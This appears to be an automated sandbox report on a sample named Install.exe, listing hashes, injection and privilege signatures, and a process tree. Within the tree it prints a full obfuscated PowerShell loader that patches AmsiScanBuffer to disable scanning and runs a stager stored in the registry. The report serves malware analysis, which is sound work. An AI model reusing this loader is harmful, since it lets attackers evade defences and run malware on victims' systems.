Analysis
-
max time kernel
26s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
03/05/2024, 16:42
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10-20240404-en
General
-
Target
Install.exe
-
Size
163KB
-
MD5
1a7d1b5d24ba30c4d3d5502295ab5e89
-
SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563
-
SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
-
SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
SSDEEP
3072:TQpsSyjlzA664oL8tIoDJxGtIVORPrdAHjl3+uwF+iBDZ/wXxnTFKe8kaz:TQpsSyjlzfnoNGxGo6PrdAHwtMxn4e8N
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4536 created 584 4536 powershell.EXE 5 -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4536 set thread context of 3724 4536 powershell.EXE 75 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\rescache\_merged\2717123927\1590785016.pri Explorer.EXE -
Modifies data under HKEY_USERS 42 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4536 powershell.EXE 4536 powershell.EXE 4536 powershell.EXE 4536 powershell.EXE 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe 3724 dllhost.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 4888 Process not Found 5044 Process not Found 848 Process not Found 920 Process not Found 4516 Process not Found 1684 Process not Found 2604 Process not Found 4900 Process not Found 3760 Process not Found 1992 Process not Found 2892 Process not Found 3012 Process not Found 1280 Process not Found 4184 Process not Found 2584 Process not Found 1480 Process not Found 1800 Process not Found 3164 Process not Found 4836 Process not Found 1856 Process not Found 2964 Process not Found 3892 Process not Found 2456 Process not Found 3300 Process not Found 4688 Process not Found 1228 Process not Found 4896 Process not Found 2924 Process not Found 4376 Process not Found 3208 Process not Found 4036 Process not Found 1120 Process not Found 4596 Process not Found 4620 Process not Found 5012 Process not Found 5100 Process not Found 3252 Process not Found 5108 Process not Found 3736 Process not Found 4840 Process not Found 2700 Process not Found 3500 Process not Found 164 Process not Found 4868 Process not Found 4972 Process not Found 4908 Process not Found 1512 Process not Found 4108 Process not Found 4872 Process not Found 1332 Process not Found 4968 Process not Found 976 Process not Found 424 Process not Found 1004 Process not Found 3640 Process not Found 1628 Process not Found 428 Process not Found 4156 Process not Found 2068 Process not Found 4960 Process not Found 4428 Process not Found 4568 Process not Found 604 Process not Found 32 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4536 powershell.EXE Token: SeDebugPrivilege 4536 powershell.EXE Token: SeDebugPrivilege 3724 dllhost.exe Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeAuditPrivilege 2232 svchost.exe Token: SeAuditPrivilege 2232 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 4536 wrote to memory of 3724 4536 powershell.EXE 75 PID 3724 wrote to memory of 584 3724 dllhost.exe 5 PID 3724 wrote to memory of 636 3724 dllhost.exe 7 PID 3724 wrote to memory of 732 3724 dllhost.exe 10 PID 3724 wrote to memory of 896 3724 dllhost.exe 13 PID 3724 wrote to memory of 992 3724 dllhost.exe 14 PID 3724 wrote to memory of 344 3724 dllhost.exe 15 PID 3724 wrote to memory of 580 3724 dllhost.exe 16 PID 3724 wrote to memory of 1040 3724 dllhost.exe 18 PID 3724 wrote to memory of 1056 3724 dllhost.exe 19 PID 3724 wrote to memory of 1104 3724 dllhost.exe 20 PID 3724 wrote to memory of 1172 3724 dllhost.exe 21 PID 3724 wrote to memory of 1204 3724 dllhost.exe 22 PID 3724 wrote to memory of 1308 3724 dllhost.exe 23 PID 3724 wrote to memory of 1360 3724 dllhost.exe 24 PID 3724 wrote to memory of 1380 3724 dllhost.exe 25 PID 3724 wrote to memory of 1408 3724 dllhost.exe 26 PID 3724 wrote to memory of 1460 3724 dllhost.exe 27 PID 3724 wrote to memory of 1500 3724 dllhost.exe 28 PID 3724 wrote to memory of 1532 3724 dllhost.exe 29 PID 3724 wrote to memory of 1596 3724 dllhost.exe 30 PID 3724 wrote to memory of 1688 3724 dllhost.exe 31 PID 3724 wrote to memory of 1704 3724 dllhost.exe 32 PID 3724 wrote to memory of 1808 3724 dllhost.exe 33 PID 3724 wrote to memory of 1820 3724 dllhost.exe 34 PID 3724 wrote to memory of 1840 3724 dllhost.exe 35 PID 3724 wrote to memory of 1916 3724 dllhost.exe 36 PID 3724 wrote to memory of 1960 3724 dllhost.exe 37 PID 3724 wrote to memory of 2044 3724 dllhost.exe 38 PID 1408 wrote to memory of 848 1408 svchost.exe 78 PID 1408 wrote to memory of 848 1408 svchost.exe 78 PID 3724 wrote to memory of 848 3724 dllhost.exe 78 PID 636 wrote to memory of 2444 636 lsass.exe 44 PID 3724 wrote to memory of 2232 3724 dllhost.exe 39 PID 3724 wrote to memory of 2260 3724 dllhost.exe 40 PID 636 wrote to memory of 2444 636 lsass.exe 44 PID 1408 wrote to memory of 1800 1408 svchost.exe 79 PID 1408 wrote to memory of 1800 1408 svchost.exe 79 PID 3724 wrote to memory of 1800 3724 dllhost.exe 79 PID 3724 wrote to memory of 2268 3724 dllhost.exe 41 PID 3724 wrote to memory of 2288 3724 dllhost.exe 42 PID 1408 wrote to memory of 3460 1408 svchost.exe 80 PID 1408 wrote to memory of 3460 1408 svchost.exe 80 PID 3724 wrote to memory of 3460 3724 dllhost.exe 80 PID 3724 wrote to memory of 2424 3724 dllhost.exe 43 PID 636 wrote to memory of 2444 636 lsass.exe 44 PID 3724 wrote to memory of 2444 3724 dllhost.exe 44 PID 636 wrote to memory of 2444 636 lsass.exe 44 PID 1408 wrote to memory of 4972 1408 svchost.exe 81 PID 1408 wrote to memory of 4972 1408 svchost.exe 81 PID 3724 wrote to memory of 4972 3724 dllhost.exe 81 PID 3724 wrote to memory of 2464 3724 dllhost.exe 45 PID 3724 wrote to memory of 2476 3724 dllhost.exe 46 PID 1408 wrote to memory of 588 1408 svchost.exe 82 PID 1408 wrote to memory of 588 1408 svchost.exe 82 PID 3724 wrote to memory of 588 3724 dllhost.exe 82 PID 3724 wrote to memory of 2488 3724 dllhost.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:992
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a06dcf06-246b-4fd2-9c0b-bbeee77d4d3d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:732
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:896
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:580
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:1040
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1056
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1104
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:trTsIbtksmih{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QenlCcUSUmMXJu,[Parameter(Position=1)][Type]$eyGUsQJiYA)$LKHDpDAhout=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'ory'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+'l'+'a'+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$LKHDpDAhout.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QenlCcUSUmMXJu).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$LKHDpDAhout.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+'S'+'lot'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l',$eyGUsQJiYA,$QenlCcUSUmMXJu).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $LKHDpDAhout.CreateType();}$aIJTXfwVlgJiV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+[Char](101)+'m'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+'a'+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+'o'+'d'+[Char](115)+'');$UGrBMyyCBWCJCV=$aIJTXfwVlgJiV.GetMethod('Ge'+[Char](116)+'P'+'r'+''+[Char](111)+''+'c'+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'S'+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HyUElLxRxKZQAoPFOfh=trTsIbtksmih @([String])([IntPtr]);$xCwlfVvzRKEpYGXrzwxlSj=trTsIbtksmih @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GXsUkrNdzqu=$aIJTXfwVlgJiV.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'Ha'+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+'.'+'d'+'l'+''+'l'+'')));$KlfnhuIvfZmVQw=$UGrBMyyCBWCJCV.Invoke($Null,@([Object]$GXsUkrNdzqu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$UdaacbYRLZVhSymzc=$UGrBMyyCBWCJCV.Invoke($Null,@([Object]$GXsUkrNdzqu,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l'+[Char](80)+'ro'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$AuTrfxf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KlfnhuIvfZmVQw,$HyUElLxRxKZQAoPFOfh).Invoke(''+[Char](97)+'ms'+'i'+'.d'+[Char](108)+''+[Char](108)+'');$LYtTsXHcMKwhfrcxV=$UGrBMyyCBWCJCV.Invoke($Null,@([Object]$AuTrfxf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'fe'+[Char](114)+'')));$BKnGymbeyC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UdaacbYRLZVhSymzc,$xCwlfVvzRKEpYGXrzwxlSj).Invoke($LYtTsXHcMKwhfrcxV,[uint32]8,4,[ref]$BKnGymbeyC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LYtTsXHcMKwhfrcxV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UdaacbYRLZVhSymzc,$xCwlfVvzRKEpYGXrzwxlSj).Invoke($LYtTsXHcMKwhfrcxV,[uint32]8,0x20,[ref]$BKnGymbeyC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'WA'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4536
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1172
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1204
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1308
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:848
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:1800
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:3460
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:4972
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:588
-
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵PID:3272
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1460
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1500
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1532
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1688
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1704
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1840
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1916
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1960
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2044
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2268
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2288
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2424
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2444
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2476
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2488
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2516
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2860
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3044
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:2688
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵PID:3604
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3780
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3964
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4704
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:5104
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2512
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4328
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2612
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:4712
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:1796
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1420
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a